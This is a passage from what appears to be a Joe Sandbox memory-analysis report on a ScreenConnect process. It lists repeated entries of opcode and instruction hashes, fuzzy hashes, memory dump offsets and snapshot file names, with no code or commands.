                                                                                                                            • Opcode ID: 56a35c242cf0172a4b1eb91eb611cd260aff84c9ca758fb4dbf51455a63a323b
                                                                                                                            • Instruction ID: 5c783bc84d048da01a92c3f2d3be16385d60bf4ae7362abf105ff24725200c66
                                                                                                                            • Opcode Fuzzy Hash: 56a35c242cf0172a4b1eb91eb611cd260aff84c9ca758fb4dbf51455a63a323b
                                                                                                                            • Instruction Fuzzy Hash: 4251D572B09A494FEBD8DE988465AA533D2FFA8310F0500B9D45ECB296DE61F816C780
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d73f5f449806594597628782611a87a09a9e6ec48ba6cd6c59f1886fe38e06a3
                                                                                                                            • Instruction ID: 71f174e1c2832fc7b43dae498d3a35a1ebda04a9f826b98c041cb1fb94abf16c
                                                                                                                            • Opcode Fuzzy Hash: d73f5f449806594597628782611a87a09a9e6ec48ba6cd6c59f1886fe38e06a3
                                                                                                                            • Instruction Fuzzy Hash: C451AB62B2DE8E0FE794EBAC58655B47BE1FF98250B0500B6D41CC71DBDC68B9018381
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: df3dc5208b71eca9e5964e00148227f6bc6a0544efd3df359ba2ce8b7218ee1b
                                                                                                                            • Instruction ID: 73a3074945279910068b1aa503e60907d44addcbeee4f08c7530a06123729290
                                                                                                                            • Opcode Fuzzy Hash: df3dc5208b71eca9e5964e00148227f6bc6a0544efd3df359ba2ce8b7218ee1b
                                                                                                                            • Instruction Fuzzy Hash: 3E51E635709A098FDADCEF58C4A56A173A2FFA930472545ACC06DCF69ACA75F843CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 323c4433180f67d75908ec6a048eeeb9b9ecf21540c578fb6b996e4e22946e5c
                                                                                                                            • Instruction ID: 82e823805b2ad46af8a49c8a82b12beea579248234231a75d50de37cd1a59c8e
                                                                                                                            • Opcode Fuzzy Hash: 323c4433180f67d75908ec6a048eeeb9b9ecf21540c578fb6b996e4e22946e5c
                                                                                                                            • Instruction Fuzzy Hash: D3414B12B1FA8A0FE79A97AC9C758A53BA0EF8121070941FFD069CB0EBDD09B905C351
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 159c2a7323367518794d53ef0de11a8724644ec68d44bbeafeb72cd4e5838cb1
                                                                                                                            • Instruction ID: 550e1060ac09947d9a630c4411a781ac5ebfc4a8730c22da5d58dedb603e1d6e
                                                                                                                            • Opcode Fuzzy Hash: 159c2a7323367518794d53ef0de11a8724644ec68d44bbeafeb72cd4e5838cb1
                                                                                                                            • Instruction Fuzzy Hash: CB41D431B1994E4BEBA8EF9884A167433D2FFD8344F5540B8D02DC72AADD35BD128740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 199cc13d04b6802b57db144a0b1b12b60f6ee17445913ad76800961d497f2bb6
                                                                                                                            • Instruction ID: 1d0f8eccc6d287e7d5ff5d180e57fc135c2421f5e1c0bd2c1da19b7281162517
                                                                                                                            • Opcode Fuzzy Hash: 199cc13d04b6802b57db144a0b1b12b60f6ee17445913ad76800961d497f2bb6
                                                                                                                            • Instruction Fuzzy Hash: 7B51E470E1A51E4FEBA4EBA88469BA437F1EF15300F0141BAD05DD72F2ED68B994CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 239d1bedf2aad0d2d678ebc56d326b53e671c5398ec24f81f1a96a257fe1dd89
                                                                                                                            • Instruction ID: 5e3b5ee7f050d9534ca452decd8ef1b83cb1699d910541de43f274e15b62d03e
                                                                                                                            • Opcode Fuzzy Hash: 239d1bedf2aad0d2d678ebc56d326b53e671c5398ec24f81f1a96a257fe1dd89
                                                                                                                            • Instruction Fuzzy Hash: C4418371709A8D4FDB98DF68C8A4A653B92FF58314B15019DD46ECB2E2CB71E852CB00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1712f0199d001fcc441476cdd53c5b0d642c4f77a15483c77632479dc4cb7384
                                                                                                                            • Instruction ID: 97992f1b2302f09df68b48f328e8cd8195609ab0d090fff76784f41fd01e92fa
                                                                                                                            • Opcode Fuzzy Hash: 1712f0199d001fcc441476cdd53c5b0d642c4f77a15483c77632479dc4cb7384
                                                                                                                            • Instruction Fuzzy Hash: A941EA72B0AA8A4FEBA5DB68887866437D2EF95300F5500B9D06CC72E2DE65BD51C701
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 67066aa10859d7d83ef687f5f4f9c96f303be9da04f45ebdef6c3cdb09f98817
                                                                                                                            • Instruction ID: 7cd40bec4e92c2cbe076f213e7311377b92268780604b3a56b13fd3c3ff4ff53
                                                                                                                            • Opcode Fuzzy Hash: 67066aa10859d7d83ef687f5f4f9c96f303be9da04f45ebdef6c3cdb09f98817
                                                                                                                            • Instruction Fuzzy Hash: AD411933D0F6964BE711ABFCD8714E53BA0EF12318B0901B6C8A98F0A3ED597945CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 83c85910144fa16eb14c2fa030a80bf3ac2f027e72773403454d60befc75ac5e
                                                                                                                            • Instruction ID: f068279bddb66a1f3eddaa46dc701e8d0c02efa8a81ea708d066cf1ff762a024
                                                                                                                            • Opcode Fuzzy Hash: 83c85910144fa16eb14c2fa030a80bf3ac2f027e72773403454d60befc75ac5e
                                                                                                                            • Instruction Fuzzy Hash: 39414771B1EA4A4BDB68EFA844656B437C2EF54340F1440BDD46ECB1E6ED64B911C340
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96036b96ac7c1670df5806ab02f40ee3096d3b381e2e410305ddbcac08ecf0e9
                                                                                                                            • Instruction ID: b1df0b8b83974e845f3b054f3222ddf2420bc1af717a064e3a897f69d22d56cc
                                                                                                                            • Opcode Fuzzy Hash: 96036b96ac7c1670df5806ab02f40ee3096d3b381e2e410305ddbcac08ecf0e9
                                                                                                                            • Instruction Fuzzy Hash: 22316C31B19E0E4FE795FB6C9865678B3D1FB98314B0406BAD41DC72A6DE24FD428381
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4a6a6a3d9138503847acea9e2226be43e8ba30cacd119d34c4b89ac9d5874d24
                                                                                                                            • Instruction ID: 2ee8cd538df6720a40f395950870a22b4ba5502e8d2e9f08b8431ddd35dd3e40
                                                                                                                            • Opcode Fuzzy Hash: 4a6a6a3d9138503847acea9e2226be43e8ba30cacd119d34c4b89ac9d5874d24
                                                                                                                            • Instruction Fuzzy Hash: 09314972B1DE4E0FEB68EA9898658B533C2FF95710B0101BDE41EC7197ED25F912C240
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2bec8cf6a5d23449e6fb607dfb79b851cd8e8715a374ef49dc5db2cab05b4cf3
                                                                                                                            • Instruction ID: 999e3977e1a81461f369f01331a72e5e5f690f9f9e088950267d3b6a4f0dac39
                                                                                                                            • Opcode Fuzzy Hash: 2bec8cf6a5d23449e6fb607dfb79b851cd8e8715a374ef49dc5db2cab05b4cf3
                                                                                                                            • Instruction Fuzzy Hash: 6131FD63E0F6D745F7255AF898724A42B60EF13E54F0E02B2C4F94E0A3EC49BA96C740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cad4d1c94723a70ad6bee8519388dda7beed26db5e038099e92fc403e6836168
                                                                                                                            • Instruction ID: 0266ec9123ea09e8382a637c3fb9eb7894f92eea2986374d7232a6b53c29bdf4
                                                                                                                            • Opcode Fuzzy Hash: cad4d1c94723a70ad6bee8519388dda7beed26db5e038099e92fc403e6836168
                                                                                                                            • Instruction Fuzzy Hash: C8319370A09A4E8FDB98EF58C460AA577A2FF99310B1101B9D02DC72D6CB35EC52CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3de80de5cbe9e117a18edf1eeeac8fd395542b62b0ca5f04f5b81d6292588251
                                                                                                                            • Instruction ID: b6eb99495727c22922d2bd4c7caa26609cb34e3f3c59f748572563ca3bc0ab9e
                                                                                                                            • Opcode Fuzzy Hash: 3de80de5cbe9e117a18edf1eeeac8fd395542b62b0ca5f04f5b81d6292588251
                                                                                                                            • Instruction Fuzzy Hash: 1331393270DE4E0BEF54EA98A4929F533D1EB50350B00007AE86A8759BED29F956C781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0a4856b0efedcd557a86a6fa71b50658d9c8ee9cf69778837430b245d29ffa1
                                                                                                                            • Instruction ID: bd4017c8dd0c851e34aa2a86aaee2e2e4bb5f1a323f9f3966ca21375584f7a4c
                                                                                                                            • Opcode Fuzzy Hash: b0a4856b0efedcd557a86a6fa71b50658d9c8ee9cf69778837430b245d29ffa1
                                                                                                                            • Instruction Fuzzy Hash: D8311620B0D68B0FE75A9B9888702B43BA2EF46304F1901B9C4A9CB1EBCD1C7906C341
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 650565a644bb98c23d479c719139e2f9187afe6a98191b19816b36b43d5a12b6
                                                                                                                            • Instruction ID: a14b43d39f9ddb3852bbd59b6ac4dd2b82eab757e871f82231ee826e33947c14
                                                                                                                            • Opcode Fuzzy Hash: 650565a644bb98c23d479c719139e2f9187afe6a98191b19816b36b43d5a12b6
                                                                                                                            • Instruction Fuzzy Hash: 7F31DC63E0F6D755F7255AF898B24D42B60EF12E54F0A02B2C4F54E0A3DC497996C750
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1e5f1262961d9eae458e71bfc794d268af00e80d4542d652fc563f39644bd2fb
                                                                                                                            • Instruction ID: ac8be97a214871ccfd20f6454b5e3c575a95b5eb617ddae4df9c2154e03581d9
                                                                                                                            • Opcode Fuzzy Hash: 1e5f1262961d9eae458e71bfc794d268af00e80d4542d652fc563f39644bd2fb
                                                                                                                            • Instruction Fuzzy Hash: BA31063190A69E4ED725AB68D4B59E57BB0FF52300F0501AAC4A98B1E3DE243547CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c39d4c34b5a4f751f15ede251ff5caa0b4ee2b72ac46cb41cd186c7de2c048a7
                                                                                                                            • Instruction ID: b8ba366434b6ca621116d2274c2b9eb0c443754f966f26723991e9b580204f64
                                                                                                                            • Opcode Fuzzy Hash: c39d4c34b5a4f751f15ede251ff5caa0b4ee2b72ac46cb41cd186c7de2c048a7
                                                                                                                            • Instruction Fuzzy Hash: 152147A3B0E94D1FEBA4AAEC44696B437D1EFA5250B0600FED01DCB1ABDD997D12C301
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9cb209d3bece6d65039153030a25834912ac265d01536089c5b4e9b6de6a4c52
                                                                                                                            • Instruction ID: d1fd95ebaa4ccb98ec681ac31121275205fd3a01a984f1679d6c2ea8a410e117
                                                                                                                            • Opcode Fuzzy Hash: 9cb209d3bece6d65039153030a25834912ac265d01536089c5b4e9b6de6a4c52
                                                                                                                            • Instruction Fuzzy Hash: 1D315E71A1591D8FEBE4EB98C458BA477F1EB58300F4141BAD41DEB2A2DE74BD80CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 846393238a5d5f95a6eb96ab4812d42f0512a65045606c5720816bdfd4c95df6
                                                                                                                            • Instruction ID: 992fe566c841afc1e12d8bfcefeb630729c35436831db8a852a963ed38005a50
                                                                                                                            • Opcode Fuzzy Hash: 846393238a5d5f95a6eb96ab4812d42f0512a65045606c5720816bdfd4c95df6
                                                                                                                            • Instruction Fuzzy Hash: 8B216B32B5EACA8FD796E77C94B0560BBD1FF46228B0501FED09CCB196EA19B941C341
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6e4f290cd565239abf8ec78259b0f05d4cc517bc01b810ff7a6ae6c9f2f6e36
                                                                                                                            • Instruction ID: 68aeadd04f7d7cb6d780c4ce912d82c042a990a100dec7e95dfecf73208c071a
                                                                                                                            • Opcode Fuzzy Hash: e6e4f290cd565239abf8ec78259b0f05d4cc517bc01b810ff7a6ae6c9f2f6e36
                                                                                                                            • Instruction Fuzzy Hash: 6B312A70B0990E8FDB98EF58C4A1AA973E2FF99314B500579E02DC7295CB75ED52CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bfef28462e80776f61663a5adb64616d12856b273d3addf01c29eae9a4a0bea6
                                                                                                                            • Instruction ID: eff6e02c32925d769782f837e80b9f93a3e85dfb2654e59fba4c0681e3eb26be
                                                                                                                            • Opcode Fuzzy Hash: bfef28462e80776f61663a5adb64616d12856b273d3addf01c29eae9a4a0bea6
                                                                                                                            • Instruction Fuzzy Hash: A0210221B0FA0A4FEB75A3E88470A7463D2AF85300B0600BAC45DCB5F2CD9CBE15C361
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 110eb365b9d91ed929dab2508afa1b184c9faa7d8b2a17cd61d77e500bf37063
                                                                                                                            • Instruction ID: 0a22313acc523b9b99bb662924b28e1227f188b401a108e99ae0b8e200cfc5f6
                                                                                                                            • Opcode Fuzzy Hash: 110eb365b9d91ed929dab2508afa1b184c9faa7d8b2a17cd61d77e500bf37063
                                                                                                                            • Instruction Fuzzy Hash: E3312D71A1591D8FEBE4EB58C469BE877F1EF68301F4141EAD01DD72A2DE74A980CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 64a75d63ce819310a7dc110ae46da602f802629d2758e28d0df0b111edae46cc
                                                                                                                            • Instruction ID: 5b95c21ee3a95bc91e7113d674fcc843c9b859fc97346c9ddccf9b7332ba8c77
                                                                                                                            • Opcode Fuzzy Hash: 64a75d63ce819310a7dc110ae46da602f802629d2758e28d0df0b111edae46cc
                                                                                                                            • Instruction Fuzzy Hash: 67117851B1EE4E0FE794ABA814E65B077C2EF9521071440BAC058CB0ABDC68A9568350
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0e658592c05c983d047f38cbe1ea4b1d785f8b24e4e5e7c23ab67e87b611c5c2
                                                                                                                            • Instruction ID: 5c2cd7d93a3e8ad00ee79d7f840e2b2653e94b9270a03ae0c83374dc8ae7cfec
                                                                                                                            • Opcode Fuzzy Hash: 0e658592c05c983d047f38cbe1ea4b1d785f8b24e4e5e7c23ab67e87b611c5c2
                                                                                                                            • Instruction Fuzzy Hash: 5511A272E0EA8C8FDF95DFA44CB41AD7FA1EF55300F0500EAE4ACC71A2DA616915CB41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01c3da205498021f8e2034171942a05d35f4a521e2321d75030a13ac61623c63
                                                                                                                            • Instruction ID: 34d9534f08d49d7c1e4276f61806077d3914d7d9e37a1bd26e953e81d8212160
                                                                                                                            • Opcode Fuzzy Hash: 01c3da205498021f8e2034171942a05d35f4a521e2321d75030a13ac61623c63
                                                                                                                            • Instruction Fuzzy Hash: 5711AC71A09A494FDB98EFA88060BA173D2FF68300B0540A8C45DCF2A6CA65F955CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8a549d4fc0e5557c0cc62b1e6470d3879b3db92017ff1bc44bca8a2a14a00c78
                                                                                                                            • Instruction ID: dade2e2b074e3e349b015560c4a2fbbfc7ad6617959177053c039b8f45f7ffbd
                                                                                                                            • Opcode Fuzzy Hash: 8a549d4fc0e5557c0cc62b1e6470d3879b3db92017ff1bc44bca8a2a14a00c78
                                                                                                                            • Instruction Fuzzy Hash: 5711E716F0EA4B0BF77992A944B13756AE1AF41340F0A40BEC459CA1EACD6C6ED1C301
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 27e7d4c5801e20d93c7a98a01249cb42c23fd66ba220c35124e46e1c6345f8cb
                                                                                                                            • Instruction ID: 2c67e079b525d3fe655aa0f3b7776fa3364ae4463d519ea9535bead24937f04a
                                                                                                                            • Opcode Fuzzy Hash: 27e7d4c5801e20d93c7a98a01249cb42c23fd66ba220c35124e46e1c6345f8cb
                                                                                                                            • Instruction Fuzzy Hash: AB01E131B0C9080BE7E4EA68E428BB577D1EFD8315F1401BED85CC32B8EA56A980C700
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dff9debce727f5dfc5993b19facd35d2a043eadb4706d17a4cbce770f6fd13bd
                                                                                                                            • Instruction ID: 0e7b754d0e2290f88829b619c0566114fcc2e369bf3b005512bce38ad0054b79
                                                                                                                            • Opcode Fuzzy Hash: dff9debce727f5dfc5993b19facd35d2a043eadb4706d17a4cbce770f6fd13bd
                                                                                                                            • Instruction Fuzzy Hash: 50118B71A19A494FDB98EFA88064BA173D2FF68300B0540E8C45DDF2A7DA75F956CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d928c7c87b2dfcf5783a4528e66cd1ab94914313100578d86a9caf793b22a03d
                                                                                                                            • Instruction ID: af07fc40a859482d6fad2e76a5cd2d0895306381f776127a0177eec9219a190e
                                                                                                                            • Opcode Fuzzy Hash: d928c7c87b2dfcf5783a4528e66cd1ab94914313100578d86a9caf793b22a03d
                                                                                                                            • Instruction Fuzzy Hash: 9601F951B2AD4F0AE7A4BBAC14F96B562C2FF9420476140BAD41CCB19FDC68F9518340
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
